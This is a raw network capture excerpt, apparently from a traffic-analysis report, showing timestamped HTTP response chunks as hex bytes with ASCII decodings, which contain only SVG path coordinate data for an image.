                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6962INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6978INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6994INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7010INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7042INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7318INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                                                                                                                          Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7334INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7350INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7366INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7382INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7398INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7414INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                                          Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7430INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7446INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                                                                                                                          Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7462INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7478INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7847INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                          Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
